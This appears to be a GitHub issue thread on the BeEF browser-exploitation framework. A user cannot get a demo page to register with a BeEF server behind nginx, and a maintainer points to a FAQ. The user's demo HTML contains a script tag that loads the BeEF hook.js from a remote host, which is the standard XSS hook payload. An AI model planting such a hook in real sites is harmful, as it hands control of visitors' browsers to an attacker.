### ISSUE TITLE
xss client hook.js reference beEF server  Can't receive the information

### ISSUE THREAD

**Issue by blackhu** [beefproject/beef#1264]
demo client:  index.html [ <html><body><script src="demo.demo.com/hook.js"></script></body></html>]

i open this index.html with  browser. but my beEF server Can't receive the information.
i use nginx pass_proxy to beEF 3000 port. nginx have access,The following ：

12/May/2016:11:18:12 +0800] "POST /ui/panel/hooked-browser-tree-update.json HTTP/1.1" 200 92
……

**Comment by bcoles** [comment]
@blackhu I have no idea what you mean.

If you're using BeEF behind nginx, perhaps this might help: https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-on-a-server-behind-nat
